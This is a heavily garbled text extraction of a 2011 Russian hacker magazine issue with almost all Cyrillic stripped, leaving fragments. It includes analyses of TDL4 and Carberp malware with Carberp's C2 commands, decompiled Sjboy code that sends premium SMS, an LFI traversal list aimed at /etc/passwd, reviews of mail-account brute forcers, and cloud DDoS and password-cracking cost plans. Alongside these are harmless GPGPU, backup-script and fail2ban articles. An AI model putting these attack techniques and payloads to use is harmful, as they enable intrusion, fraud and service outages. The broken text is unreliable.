trac.webkit.org/wiki/BuildingOnWindows.
Chrome.
, .
--single-process:
.
Safari, 0day,
.
?
Firefox :
, ,
. (heap).
Firefox, :
.
Chrome:
, ,
Firefox .
Safari:
, . :).
. ,
. : . : SVG,
. , ,
. ,
100%
, . , , , , Safari Positive Hack Days. z
X 08/151/ 2011
QWERTY, 12345, GFHJKM

Anonymous Lulzsec
. , torrent' Sony Pictures,
40 .
(www.troyhunt.com) .

12,000
0
1
10 11
12 13 14 15 16 17 18 19 20
, . 93% 6 10 (,
), 50% 8 . ,
.
45%
4%
1%
, .
,
,
, .
2,000
50%
4,000
6,000
8,000
10,000
8%
36%
64%
,
?
1,7 (dazzlepod.com/
site_media/txt/passwords.txt) , .
,
!
X 08/151/ 2011
18%
92%
: ?. Sony Pictures ,

. ,
92% .
82%
Sony Pictures (
!), , 82% (projectrainbowcrack.com).
9 .
063
TDL4

- TDL4
C PHD2011 ,
Olmarik (TDL4). PHD
,
.
, ,
. x64- ,
,
.
64- MS Windows (Vista,

Win7) , ,
, .
. , - Win64/
TrojanDownloader.Necurs,
, ( ) (Bcdedit.exe
-set TESTSIGNING ON) Boot Configuration Data (BCD)
TESTSIGNING.
. Win64/Spy.Banker,
TDL4

.
TDL4
, MBR (Master
Boot Record),
ZwRaiseHardError(), BSOD .
(. . 1).
, MBR,
MBR . (. . 2).
,
,
064
(ROR)
. ldr16,
.
ldr16 BCD
, .
(. . 3).
ldr16
BcdOSLoaderBoolean_WinPEMode (0x26000022),
preinstallation mode, . kdcom.dll,
WinDbg.
kdcom.dll
ldr32 ldr64, , /MININT,
M/
NI, .
:
kdcom.dll? , ,
KdDebuggerInitialize1(),
kdcom.dll, . ,
PsSetLoadImageNotifyRoutine(), .

IoCreateDriver(), -.

.
, (. . 4).
, MS ,
KB2506014,
WinPEMode
kdcom.dll. , X 08/151/ 2011
[1]
[2]
[3] Boot Configuration Data

Win32/Olmarik.AMN,
:).
,
.

.
.
,

TdlFsReader (eset.ru/tools/TdlFsReader.exe).

, TDL3. , :

;

;
;
.
TdlFsReader
.
,
,
,
X 08/151/ 2011
[4]
[5] TdlFsReader
. , TDL4,
,
.
,
TDL
. , ,
. z
065

, Positive Technologies
CLOUD
HACKING

. cloud computing

.
IaaS
:
SaaS (Software as a Service)
PaaS (Platform as a Service)
IaaS (Infrastructure as a Service)
HaaS (Hardware as a Service)
WaaS (Workplace as a Service)
IaaS (Infrastructure as a Service)
EaaS (Everything as a Service)
DaaS (Data as a Service)
SaaS (Security as a Service)
IaaS, . IaaS

.

. IaaS ?

:
IPS ;
;
;
;
.
,
,
.
? .
066

. , ,
,
.
, ,
- .
, -,

. , ,
IP-,
. ,
.

,
.
, ,
. :
IP-, ,
,
.

IaaS , IPS/IDS.
X 08/151/ 2011
EC2:
20
IPS/IDS
, IP-
, . IPS/IDS , ,
IP- , .
, ,
,
.

IaaS-
. , ,
client-side-. -,
, ,
metasploit canvas. -,
,
, IP-
. , IaaS ,
, IaaS,
.

.

.
ntlm (mixalpha-numeric-all-space, 8 ) .

ssh
1290 . ,
,
1,5
$320k. , ,
, 1,5
. 1
.
20 : 2 x
Intel Xeon X5570 quad-core Nehalem architecture, 2 NVidia
Tesla M2050, 23 .
,
NTLM- 8
. .
8
. ,

(www.ptsecurity.ru/download/PT-Metrics-Passwords-2009.pdf),
, -
Instance
20
$6590 + $0,56/hour
Data Storage
418 Tb
$ 102 / Tb
:
X 08/151/ 2011

20 * $6590 = $131 800
$ 0,56 * 20 * 12834 = $ 143 740
$ 102 * 418 =$ 42 636
$ 318 176
067
( 1 12 )
$ 103
(low-case) ( 1 12 )
21
$ 2 363 252
( 1 11 )
275
$ 754 064
(low-case) ( 1 10 )
11
$ 9 823
(low-case) ( 1 12 )
1046
$ 80 919 507
(low-case) ( 1 11 )
27
$ 4 631 216
(low-case) ( 1 10 )
297
$ 188 884
(low-case) ( 1 9 )
11
$ 9 695
Instance ()
$0,085 ~ 3
(in+out) ()
$0,150 ~ 5
3

.
2 .
,
, (lowcase) ( 1 12 )
80 . ,
. , 20 000
20, .
DDoS
- /. -:
;
.
IaaS DDoS- ,
-. IaaS
.

.

. :
(Linux/Windows);
;
(<->).
:
SYN flood
UDP flood
ICMP flood
Application flood
HTTP/HTTPS (GET/POST)
FTP
SMTP/SMTP+SSL/TLS
POP3/POP3+SSL
,
.
,

.
:
Mauszahn (www.perihel.at/sec/mz/)
( , ). VoIP
,
,
.
SlowPost.pl ( SlowLoris HTTP DoS Tool)
, HTTP
POST- -, (
).
SlowLoris HTTP DoS (ha.ckers.org/blog/20090617/
slowloris-http-dos/). Application Flood
HTTP POST-

Defcon 18 (bit.
ly/lid5Sr).
Application Flood HTTP, , ,
(
- Defcon) ,
.

Application Flood,
. SlowPost.pl
Application Flood. , -
Instance
$0,085 ~ 3 /
(in+out) ()
<1
<$0,150 ~ <4
<7 /
068
X 08/151/ 2011
Rainbow tables
900
- .
, - Apache.
MaxClients 256: -
256
. - IIS (Windows 2003 Server),
Apache, , 20 000.

IaaS Amazon (aws.amazon.com).
. -, Amazon ,

. -,

, 3, ,
Amazon .
Instance, , :
x86/x64 (1 CPU);
613 ;
10 HDD.
Instance , ,
. Instance
100 Mb/s,

.
.
,
HTTP-.
, 1 Instance + SlowPost.pl
900 -.
, ,
-, 900. ,

, .
- 7 ! (.
4)
, IIS.
IP-. ,
, 20 000
IP-. -
. ,

46 Instance, 900 . , Amazon 20
Instance. , DDoS-, . ,
-. ,
300 .
- (Prepaid Card For
Internet Shopping) $5 Amazon . ,
AMI
HTTP DoS -
X 08/151/ 2011
069
900
Instance
46
$0,085 * 46 * 2 = ~ 240
(in+out) ()
<2
:
<$0,150 ~ <8
1150
- 1150 .
5.
-
,
-.
Instance

-.
,
, ,
. ,
. ,
, , : ,
, ,
, .
, .
:
AMI
;
( , ..);

,
HTTP-GET- ,
.
, .
1000 ! , .

, .
Abuse-
,
.
070
. ,
, (, Amazon), abuse
. ,
. -,
, , IP- , .
,
.
:
, , , .
,
:
IP- ;
IP- ;
, ;
, ;
, (
4 );
.

. , IP-
,
.
-

.
,
,
. . ,
,
. z
X 08/151/ 2011

(icq 884888, snipper.ru)

blackhat
X-TOOLS
: Witchxtool
: *nix/win
: th3_w1tch
: MRBrute
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: [i]Pro, Dark-web.ws
!
,
Makassar Ethical
Hacker .
,
LFI.
,
LFI (Local File
Include). :
Target : http://site.com/index.
php?page=
# LFI,
:
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
..

MD5, SQL,
proxylist.net ..

, .
Data::Validate::IP:
cd modules
cd-Net-RawIP 00:25
perl Makefile.PL
make & & make install
072
Mail.Ru

Mail.Ru.

:
(
);
Delimiter Source:
<Login>:<Password>;
Type Proxy .

.
:
, .
Generate
Source.txt.

:
HTTP Proxy
.
: MGrab
Vista/2008 Server/7
: Boolean
( 150
);
(HTTP/SOCKS4/5);
;

(
,
);
;
.NET Framework.

:
Bad ;
Good Good ()
;
Source ,
email@mail.ru:
password;
Proxy
;
Threads ;
TimeOut
Mail.Ru
Mail.Ru.
-,

MRBrute.
otvet.mail.
ru, . :
;
;
X 08 /151/ 2011
;
;
;

For Grab (:
friends, auto, business, countries,
magic, relax, food ..).

,
.
: Reallogger
Vista/2008 Server/7
: Van32
TDS Killer ,

(TDS). : Simple TDS Advanced TDS.
:
my $thr = 20; # -
my $tds_type = 0;
# 0 Simple TDS; 1 Advanced TDS
good.txt,
.
bit.ly/iiv2S3.
.
: ICQ Multiregger
Vista/2008 Server/7
: Zdez Bil Ya
tds.txt
TDS, login.txt pass.txt
.
.
,
.
:
Simple TDS inurl:go.php?sid=
Advanced TDS out.php?s_id=

Reallogger fuckav.ru Van32.
,

.
: ,
FTP- php- POST-.
:
tds_checker.pl,
.
bit.ly/mwL4hO.
: Rambler Regger
Vista/2008 Server/7
: Zdez Bil Ya
HKCU\Software\Microsoft\Windows\
CurrentVersion\Run :AntVir
c:\documents and settings\admin\local
settings\application data\antvir.exe

FuckAV: bit.ly/
jIClsC.
:TDS Killer
: *nix/win
: daniel_1024

Rambler
TDS
Zdez Bil Ya.

email
Rambler.ru. ( socks),

Antigate. , -
X 08 /151/ 2011
Zdez Bil Ya icq.com,

, , . ,
email- (
Rambler Regger).

,

, . :
;
;
;
;
: email;
( );

good.txt;
: mail.ru (bk.ru, inbox.
ru, list.ru), yandex.ru, rambler.ru;

, POP-
pop.site.domain.
,
:). : bit.ly/k8yQzt. z
073
MALWARE
, Malware Analyst Group-IB (Slim_d0g@mail.ru)
, Malware Analyst Group-IB (iRe9ent@gmail.com)
GENERATION
CARBERP

Win32/Carberp , 2010
, , .

. Zeus
SpyEye.
.
?
, , VirusTotal.com,
,
.
074
BinDiff IDA, ,
.
HIEW, . -, PE-. -, .text
, , ,
X 08 /151/ 2011
GMER - -
(kernel32.dll advapi32.dll),
(EqualPrefixSid),
. . , . .reloc
, .
.
, ,
,
, (.
1).
.

-
.
, . ,
.
,
, Windows (ntdll.dll, kernel32.dll ws2_32.dll). ,
.
, ,
10 ,
. , -
, 10 , .
, Carberp \ API Monitor
:).
API- .
, ,
. , -
, TaskManager
,

, ,
OllyDbg IDA,
.
,
,
.

-
.
, explorer.exe.
.
ESET
Win32/TrojanDownloader.Carberp.W
641C4FF3047077231A92931D75C20017
Win32/TrojanDownloader.Carberp.X
D9D92134F12469A68FCA24F49F1CC608
a variant of Win32/Kryptik.LKI ( )
74995A8F06E1268A43E1CF26A36DFF84
1.
X 08 /151/ 2011
075
MALWARE
Win32/Troja
TrojanDownloader.Carberp
Win32/TrojanDownloader.
Carberp.W
trojan
Win32/TrojanDownloader.
Carberp.X trojan
Win32/TrojanDownloader.Carberp.X
trojan

Section

"Section"
QueueAPCThread()
API
2. ,
, CreateProcess
CREATE_SUSPENDED, , explorer.
exe. ZwCreateSection (SectionObject ,
) (, , ).
ZwMapViewOfSection
memcpy
. ,
explorer.exe,
. ,
explorer.
ReadProcessMemory explorer.exe ,
,
. ,
,
memcpy explorer
.
,
. , explorer
, .
explorer.
ZwResumeThread, ,
.
, Carberp , payload
. ,
API-.
Carberp explorer.exe.
076
,
, .
ZwQueueApcThread,
explorer ,
. ZwResumeThread
.
,
, . ,
, Carberp ,

%HOMEDRIVE%\%HOMEPATH%\StartMenu\Programs\StartUp\.
, ! ,
.
explorer.exe, -
explorer.exe, 1
X 08 /151/ 2011
rojanDownloader.Carberp

, explorer.
PID-. ,
. FindWindow ("Shell_
TrayWnd", 0) GetWindowThreadProcessId (hWnd, &id),
, id PID.
- id=0,
.
PID ,
explorer ZwOpenProcess +
WriteProcessMemory.
NtQueryDirectoryFile NtResumeThread
ntdll.dll. (, RootkitUnhooker),
. , KiFastSystemCall (. ).
? NtQueryDirectoryFile
, . ( explorer cmd)
.
, . NtResumeThread
explorer (!)
. , explorer , PID
,
. ,
, explorer, .
,
Carberp. ,
, 2.
,
. ,
, IBank
Zeus
.
,
,
,
cab-
.

. .

1 :
1. 1.
2. GET-, :
uptime;
downlink;
uplink;
id ( ,
);
statpass ( );
comment.
:
/stat?uptime=<val1>&downlink=<val2>&uplink=<val3>
&id=<val4>&statpass=<val5>&comment=<val6>
3. .
2 :
explorer.exe, 2
X 08 /151/ 2011
explorer.exe, 3
077
Win32/TrojanDownloader.Carber
MALWARE
explorer.exe
IDE
1. .
:
ok;
badpass;
session: < >.
3 :
1. :
ok ;
badpass, session
.

1 :
1. POST- 2, :
, ;
,
.
:
1|palladin|05B45905A93F7D4B843D385AAE079AF1|0|0
:
a=e15e327af46a915c1b0014a284c052787ea7d63c8c40b1
a3dcafea6bb8e7076b0f6601861783dff7cbca429eb76a47
.
2. .cab-
2.
3.
. ,
, :
0|check|00000000000000000000000000000000|
2 :
1. .
.
2. . (.
3).
3 :
1. (. 4).
, Carberp :
update
update
dexec
download
killbot
killuser
startsb
loaddll
grabber
3. , ,
078
X 08 /151/ 2011
berp
Win32/TrojanDownload
.text
, , , .
,
.
,
. , .
, , ,
-.

, .
miniav.plug, killav.plug
passw.plug ( ,
Carberp ).
python, , . ,
miniav.plug
Carberpa , , Zeus,
. killav.plug
, passw.plug
.
, ,
, , .

. ,
.
Carberp. z
update
update
PE-

dexec
download
PE-

killbot
killuser
startsb
loaddll
grabber
4.
X 08 /151/ 2011
079
MALWARE

. 1.
Sjboy
. 2.
J2ME

Sjboy
J2ME-

. ,
,
.
,
.
, Java 2 Micro Edition (J2ME).
,
( , :)).
. ,
Sjboy.

(. . 1).
.
. ,
. (,
):
,
. ,
c ,
.

.
, . ,
(, - ):
aa popaa aao coaa pecpa,
oopa opa a ocy aoy apoy apxy
080
poecx apyo, oope ocy a c 18 e

oee. Cay popay B aaee ecao, oaa
pocxo oo a pa o apy aeo oepaopa, a
a opaeoe cooee ae, Bae cooc cc
cooe opay oopx apoc poee cocoe:
a oep 5370 ~10.31$ (15 ), 5373 ~4.57$ (7 ),
7250 ~3.64$ (3 ) .e ec: caa ecao a cae
acaec oo aa poe, a a cooe oopoe
ocae poee, ae. poee apoc
opay sms!!! o apecppoac apo
poeco apxe, B aaee a. ocaoo aa
o pa, aee 2 paa cy co cea, a a 2 sms, ec
aee 3 paa, o cyy cy 3 paa cooeceo. 3 , !
? ,
?! , , ,
. .
,
, .
,
,
. .
X 08 /151/ 2011
, . JAR.
ZIP, . , .
J2ME- midlet.class.
.class Java.
, C/C++: .c/.cpp .obj. Java class , ,
JAD. . , ,
midlet.class, class,
.
, sendNextSms. ,
, . ,
, . ,
. midlet.class
:
if (e_boolean_fld)
{
e_boolean_fld = false;
sendNextSms();
}
, , e_boolean_fld true. :
if(i == b.b && mode > 4 && mode < 6)
{
e.a(e.f, e.g);
if(b.e > 1)
{
while(b.a_int_array2d_static_fld[rX][rY] == 0)
{
nextX();
nextY();
}
b.a_int_array2d_static_fld[rX][rY] = 0;
b.e--;
c_int_fld = 100 b.f * b.e;
if(c_int_fld > d_int_fld)
{
e_boolean_fld = true;
d_int_fld = d_int_fld + 11;
}
nextY();
return;
} else {
a_b_fld.a(d.a, null);
a_b_fld.b("!");
a_b_fld.a(e_java_lang_String_fld);
e.a(e.g, 0);
a_b_fld.serviceRepaints();
a_long_fld = System.currentTimeMillis();
mode = 6;
c_boolean_fld = true;
return;
}
}
, , ,
.
X 08 /151/ 2011

. , b.e . , :
a_b_fld.b(!);. ,
: b.e--;, . ,
e_boolean_fld, SMS,
: c_int_fld > d_int_fld.
, b.e , c_int_fld, , : c_int_fld = 100 - b.f
* b.e.
sendNextSMS
():
String s1 = b_java_lang_String_fld;
String s = c_java_lang_String_fld;
c c1 = a_c_fld;
System.gc();
if(c1.a_java_lang_Thread_fld == null)
{
c1.a_boolean_fld = false;
c1.a_java_lang_String_fld = s1;
c1.b = "sms://" + s;
c1.a_java_lang_Thread_fld = new Thread(c1);
c1.a_java_lang_Thread_fld.start();
}
try
{
Thread.sleep(300L);
}
catch(Exception _ex) { }
c1. ,
s , SMS, s1 . , , ,
c1. :
MessageConnection messageconnection;
System.gc();
messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)
(messageconnection = (MessageConnection)Connector.open(b)).
newMessage("text")).setAddress(b);
textmessage.setPayloadText(a_java_lang_String_fld);
messageconnection.send(textmessage);
, , .
. ,
a_java_lang_String_fld: textmessage.setPayloadText(a_java_
lang_String_fld);. , b: (textmessage = (TextMessage)(messageconnection =
(MessageConnection)Connector.open(b)).newMessage("text")).
setAddress(b);. -
: messageconnection.send(textmessage);.
. ,
. ,
: -,
. , ,
. z
081

Mifrill (mifrill@real.xakep.ru)
HD MOORE
Metasploit
(HD Moore)
.
2000- - HITB
, :
. , , ,
!.
22 .

1981
-
. , HD
Moore, . ,
( H,
), D,
.
,
.

IT-, ,
.

. .
( ).
(
) ,

. ,

.
,

, ,
. ,
, 17
,
SHADOW
(Secondary Heuristic Analysis for Defensive
082
Online Warfare).
,

.
,
.

Yahoo.
white hat
Yahoo
,

.
.
,
,
Computer Sciences
Corporation
. ,

, , ,
,

.

,
. , , ,
( ) Metasploit.
, , , , , ,
HITB, :). ,

,
.
Metasploit 2003
,
.
,
, Metasploit
Framework . ,
.
,
.
,

.
(http://digitaloffense.net) Metasploit Framework : Metasploit -,

,
,

Metasploit .
Metasploit ,
- . , ,
- , -
Linux . SOURCE .
Perl
X 08 /151/ 2011

curses. ,
2006 ,
, Metasploit LLC,
.
BreakingPoint,
. BreakingPoint

,

Ruby ( , Python C).
, LEGO ,
,
.
Metasploit
,
Metasploit, 2005
X 08 /151/ 2011
,
, ,

. ,
. 4

, ,
BreakingPoint .

, ,
. ,
,
,
. , , :

,
iDefense?. Metasploit, ,

, , .
,
,

, -,

Metasploit .
,
, , (
),
- . ,
,
083
Metasploit
, , ,
. , ,

, CERT.
2009 ,
Metasploit Rapid7,
. ,
BreakingPoint, Rapid7 ,
.

, .
Metasploit Framework - ,
Metasploit Express,
$3000 , Metasploit Pro,
. , ,
2008 , Metasploit Framework
BSD.
,
, open-source.

,
. Metasploit ,
.
Rapid7, ,
9
.
, Metasploit. , ,
. ,
,
. , 2000-,
$5 000
PayPal- .
,
, ,
, .
2010 Rapid7 SANS

Metasploit Framework. :
, . , , - .
,
:).
, 2006
,
, , , AxMan.
ActiveX .

, .
Metasploit Framework -
,
Metasploit Express,
$3000
084
WarVOX,
, war-dialing. ,
-, , , .
8 10 000
. WarVOX .
- , WarVOX
. ,
, , ,
, . z
X 08 /151/ 2011
UNIXOID
(execbit.ru)
GPU

. ,
CUDA, Stream OpenCL, -
. ,
, , . , ,
.
,
GPGPU (General-purpose graphics processing units, ) . ,
,
, ,

, , ,
.
086
GPGPU
, ,
, , .
,
, ,
.

, .
, (X 08 /151/ 2011
()

AES OpenCL
KGPU Linux, GPU

KGPU (code.google.com/p/kgpu/),
Linux

CUDA.
Linux ,
,

CUDA. ,
,
, KGPU
AES,
eCryptfs 6 .
)
, .
,
.
x86-,
( ) , , SSE, , .. ..
,
, ,

, (
BrookGPU,
DirectX OpenGL).
,
,
,

GPU ( nVidia ).
nVidia CUDA, ,
GPU - .
ATi (AMD)
Close to Metal ( Stream),
X 08 /151/ 2011

Apple, OpenCL.
INFO
GPU ?
, GPGPU .
. GPU
(
,
),
.
GPU ,
. GPU
, ,
. GPU
. -
( ),
,
. GPU
,
,
, (, , ,
, ,
, ).
GPGPU ,
GPU .

,
. , , .
,
.
: ,
,
GPU :
GRAM . ,

info

GPGPU
.
OpenCL
SDK, Intel,

CPU.
FASTRA II
,
13 ,
12TFLOPS: fastra2.
ua.ac.be.
HTTP://WWW
links
bzip2-cuda.github.
com
bzip2

CUDA.
www.hoopoe-cloud.
com
,

CUDA OpenCL.
087
UNIXOID
nVidia CUDA
GPGPU
clinfo ,
Stream-
( FlacCL,
).
.
OpenCL,
GPGPU. CUDA,
(, OpenCL
nVidia CUDA),
.
, , GPGPU -
, , ,
( ). ,
. , , FlacCL,
FLAC. GPGPU
,
ImageMagick,
OpenCL. CUDA/OpenCL ( ATi) .
,
, , .
-, , CUDA Stream. , ,
, 2009.
:
en.wikipedia.org/wiki/CUDA en.wikipedia.org/wiki/AMD_Stream_
Processor.
, ,
,
.
-, ,
GPGPU, OpenCL.
-, GPGPU,
,
SDK : CUDA Toolkit (goo.gl/lbdxm) ATI Stream SDK
(goo.gl/YS2K). .
CUDA Toolkit
CUDA Toolkit Linux

( , Fedora,
RHEL, Ubuntu SUSE, x86,
088
x86_64). , (Developer Drivers for Linux, ).

SDK:
$ sudo sh cudatoolkit_4.0.17_linux_64_ubuntu10.10.run
, .
X-:
# sudo /etc/init.d/gdm stop
<Ctrl+Alt+F5> :
$ sudo sh devdriver_4.0_linux_64_270.41.19.run
:
$ startx
CUDA/OpenCL,
CUDA- LD_LIBRARY_PATH:
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib64
, 32- :
$ export LD_LIBRARY_PATH=/usr/local/cuda/lib32
CUDA,
:
$ export C_INCLUDE_PATH=/usr/local/cuda/include
, CUDA/OpenCL-.
ATI Stream SDK
Stream SDK , AMD (

/opt) LD_
LIBRARY_PATH:
$ wget http://goo.gl/CNCNo
$ sudo tar -xzf ~/AMD-APP-SDK-v2.4-lnx64.tgz -C /opt
$ export \
LD_LIBRARY_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/
$ export C_INCLUDE_PATH=/opt/AMD-APP-SDK-v2.4-lnx64/include/
CUDA Toolkit, x86_64 x86

32- . icd-registration.tgz (
):
X 08 /151/ 2011
OpenCL nVidia
CUDA Toolkit
$ sudo tar -xzf \
/opt/AMD-APP-SDK-v2.4-lnx64/icd-registration.tgz - /
/ clinfo:
$ /opt/AMD-APP-SDK-v2.4-lnx64/bin/x86_64/clinfo
ImageMagick OpenCL
OpenCL ImageMagick ,
.
IM .
, SDK,
-
nVidia AMD. , / :
$ wget http://goo.gl/F6VYV
$ tar -xjf ImageMagick-6.7.0-0.tar.bz2
$ cd ImageMagick-6.7.0-0
:
$ sudo apt-get install build-essential

OpenCL:
$ LDFLAGS=-L$LD_LIBRARY_PATH ./configure | \
grep -e cl.h -e OpenCL

:
checking
checking
checking
checking
checking
checking
checking
CL/cl.h usability... yes

CL/cl.h presence... yes
for CL/cl.h... yes
OpenCL/cl.h usability... no
OpenCL/cl.h presence... no
for OpenCL/cl.h... no
for OpenCL library... -lOpenCL
yes ,
( ). , , ,
C_INCLUDE_PATH.
X 08 /151/ 2011
FlacCL flac
no , , LD_LIBRARY_PATH. , /
:
$ sudo make install clean
, ImageMagick OpenCL:
$ /usr/local/bin/convert -version | grep Features
Features: OpenMP OpenCL
.
ImageMagick convolve:
$ time /usr/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg
$ time /usr/local/bin/convert image.jpg -convolve \
'-1, -1, -1, -1, 9, -1, -1, -1, -1' image2.jpg
, , , , ImageMagick
, .
OpenCL.
FlacCL (Flacuda)
FlacCL (www.cuetools.net/doku.php/flacuda)
FLAC,
OpenCL. CUETools (www.cuetools.net/doku.
php) Windows, mono Linux.
:
$ mkdir flaccl && cd flaccl
$ wget www.cuetools.net/install/flaccl03.rar
unrar, mono :
$ sudo apt-get install unrar mono
$ unrar x flaccl03.rar
OpenCL, :
$ ln -s $LD_LIBRARY_PATH/libOpenCL.so libopencl.so
089
UNIXOID
GPU x86-
:
$ mono CUETools.FLACCL.cmd.exe music.wav
Error: Requested
compile size is bigger than the required workgroup size of 32, ,
,
--group-size XX, XX .
, - OpenCL
. FlacCL ,
.
oclHashcat
, GPGPU
. ,
GPU-. ,
.
oclHashcat.
oclHashcat (hashcat.net/oclhashcat/) ,
,
GPU OpenCL.
, , MD5 nVidia GTX580 15800 , oclHashcat
- 9 .
OpenCL CUDA, MD5,
md5($pass.$salt), md5(md5($pass)), vBulletin < v3.8.5, SHA1,
sha1($pass.$salt), MySQL, MD4, NTLM, Domain Cached Credentials,
SHA256, .
090
(, -, ), Linux-, : hashcat.net/files/oclHashcat-0.25.7z.
:
$ 7z x oclHashcat-0.25.7z
$ cd oclHashcat-0.25
(
):
$ ./oclHashcat64.bin example.hash ?l?l?l?l \
example.dict
oclHashcat ,
, YES.
, <s>.
, <p>, <r>.
(, aaaaaaaa
zzzzzzzz):
$ ./oclHashcat64.bin hash.txt ?l?l?l?l \
?l?l?l?l
, ( docs/examples.txt).
11 ,
( aaaaaaaa zzzzzzzz) 40 . GPU ( RV710) 88,3 /.
, GPGPU
. , Windows-,
Linux. z
X 08 /151/ 2011
>> coding
UNIXOID
(execbit.ru)
1000

Linux. - : , ,
. . , .

?
:
1. ? !.
, ,
. , .
2. , .
, , , ,
, .
, , - .
.
? : .
, - , (
, ).
. ,
,

.
- ,
,
. ,
:
092
// , config.cfg,

$ cp config.cfg config.cfg.bak
// ,
$ vim config.cfg
// , ,
$ mv config.cfg.bak config.cfg
, . . ,

- .
.
,
, . , .
:
vim() {
FILE=$1
DATE=`date +'%F'`
BAK=.$FILE.bak
cp $FILE $BAK-$DATE
rm -f $BAK
ln -s $BAK-DATE $BAK
vim $FILE
}
X 08 /151/ 2011
btrfs

,
INFO
info
FreeBSD

Inotify kqueue,
,

, .
,
.
.
btrfs

mv .$1.bak $1
}
~/.bashrc, vim,

( ), ret,
.
,
,
.
X 08 /151/ 2011

, Inotify. Linux, ,
,

inotifywait.
Inotifywait ( inotify-tools)
, ,
,
, . :
, , .
inotifywait ,
,
, ,
:
$ vi ~/bin/in-back.sh
#!/bin/sh
DIR=`pwd`
WARNING
warning

fsniper

torrent-.
Torrent-

,

.
HTTP://WWW
links
distanz.ch/inotail/
tail, Inotify.
093
UNIXOID
$ vi ~/bin/in-back2.sh
#!/bin/sh
DIR=`pwd`
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
--format'%T %f' -e close_write $DIR | \
while read DATE TIME FILE; do
cp $FILE .$FILE.bak-$DATE-$TIME
done
, . '-m' inotifywait
, '--timefmt'
'--format' , , ,
. , , .
:
$ ls -la | grep -e '.*\.bak-\.*'
:
$ rm -rf *.bak-*
, ,
, incron fsniper,
inotify .
inotifywait /proc
while inotifywait -r -e modify $DIR; do
cp $DIR ~/bak/.$DIR.bak
done;

, . ,
inotifywait ,
.
:
inotifywait , , . incron.
incron, , Inotify-
cron. ,
, . , /,
, ,
. :
$@ /,
$# ,
094
X 08 /151/ 2011
$% ( )
$& ( )
cron-
incrontab, '-i'
. cron '-e'. , , :
[] [] []
/, ,
, ,
(
).

inotify inotifywait. :
IN_ACCESS (, )
IN_ATTRIB (
)
IN_CLOSE_WRITE File , ,
IN_CLOSE_NOWRITE File , ,
IN_CREATE
IN_DELETE
IN_DELETE_SELF
IN_MODIFY
IN_MOVE_SELF /
IN_MOVED_FROM
IN_MOVED_TO
IN_OPEN
, ,
/etc/incron.allow /etc/incron.deny, .
,
.
incrond .
, . ,
, .
, incrond /etc. :
$ export EDITOR=vim
$ sudo crontab -e
:
/etc IN_CLOSE_WRITE /bin/cp $@/$# $@/.$#.bak-`/bin/date +'%F'`
,

, , .
inotify- fsniper
(freshmeat.net/projects/fsniper).
, .
fsniper . incron ,
,
,
X 08 /151/ 2011

.
, , , , (,
). , ~/images, ~/video, ~/music .. , fsniper
, .
, .
,
. , ,
fsniper:
$ sudo apt-get install fsniper
:
$ mkdir ~/.config/fsniper
config :
$ vi ~/.config/fsniper/config
watch {
#
~/downloads {
image/* {
handler = cp %% ~/images
}
video/* {
handler = cp %% ~/video
}
audio/* {
handler = cp %% ~/music
}
}
}
, ,
. ,
mime-,
(, *.avi)
(.*HDRip.*).
fsniper
:
$ fsniper --daemon
, , , incron, fsniper
,
. Gnome KDE
,
~/.xsession:
$ vi ~/.xsession
fsniper --daemon &
, hand made-
, ,
Linux
. ,
.
, , -, .
095
UNIXOID
SSH- rsync
wayback (wayback.
sourceforge.net). ,
, ,
. wayback,
:
$ sudo apt-get install wayback
mount.
wayback:
$ mount.wayback // //
,
,
.
vstat:
$ vstat
vrevert:
$ vrevert -d 12:00:00
, 12 .
096
, , :
$ vrevert -d 2011:01:01:0:00:00
, , , vstat:
$ vrevert -n 5
,
, vrm:
$ vrm
, . , ?

.

.
,

.
,
X 08 /151/ 2011
first_snapshot
second_snapshot
btrfs copy-onwrite ( ), ,
.
.
wayback

.
ext3 ext4 ( ), btrfs, ,
Linux- ( 2.6.29-rc).
,
, .
btrfs , btrfsprogs ( btrfs-progs-unstable).
:
,
.
,
. ,
- .

rsync. /
, .
, ,

, , , .
rsync ,
,
.
.
rsync SSH.
:
$ sudo apt-get install btrfs-progs
,
:
$ sudo mkfs.btrfs /dev/sdXX
$ sudo mount /dev/sdXX /mnt
,
:
$ sudo btrfsctl -s first_snapshot /mnt
- :
$ sudo btrfsctl -s second_snapshot /mnt
,
.
,
,
subvol=_:
$ sudo umount /mnt
$ sudo mount -o subvol=first_snapshot /dev/hdXX /mnt

subvol=., :
$ sudo umount /mnt
$ mount -o subvol=. /dev/hdXX /mnt
$ ls -1
default
X 08 /151/ 2011
$ sudo apt-get install rsync

$ rsync -a --delete -e ssh /// \
@:///
, .

:
$ vi ~/bin/in-rsync.sh
#!/bin/sh
DIR=`pwd`
#
USER="vasya"
HOST="host.com"
REMOTEDIR="/backup"
inotifywait -mr --timefmt '%d-%m-%y %H-%M' \
--format'%T %f' -e close_write $DIR | \
while read DATE TIME FILE; do
rsync -a --delete -e ssh ${DIR}/${FILE} \
${USER}@${HOST}:${REMOTEDIR}
done

.
, rsnapshot, .
,
. , ,
. z
097
UNIXOID
grinder (grinder@tux.in.ua)
iptables
IP-
, .
, , IP . iptables,
.

fail2ban
, ,
,
. ,
Fail2ban (fail2ban.org). : ,
,
. , IP iptables/ipwf
TCP Wrapper (/etc/hosts.allow|deny).
, , ,
. / e-mail. Fail2ban
SSH, ,
,
IP. ,
.
Fail2ban
Linux,
.

.
Ubuntu/Debian :
$ sudo apt-get install fail2ban
, SSH.
098
,
/etc/fail2ban ( Debian/Ubuntu). fail2ban.conf
,
. 0.7,
.
filter.d action.d.
.conf .local. ,
- ,
.conf .
. .
, . , HOST ,
IP :
(?:::f{4,6}:)?(?P<host>[\w\-.^_]+)
, , DDOS- SSH:
$ grep -v '^#' /etc/fail2ban/filter.d/sshd-ddos.conf
[Definition]
failregex = sshd(?:\[\d+\])?: Did not receive identification
string from <HOST>$
ignoreregex =
failregex , . ignoreregex , .
. ,
X 08 /151/ 2011
fail2ban
, .
- fail2ban-regex,
.
, Asterisk
, VoIP ,
:
NOTICE[3309] chan_sip.c: Registration from
'sip:XXX@1.2.3.4' failed for '9.8.7.6' No matching
peer found
:
failregex = NOTICE.* .*: Registration from '.*'
failed for '' No matching peer found
. :
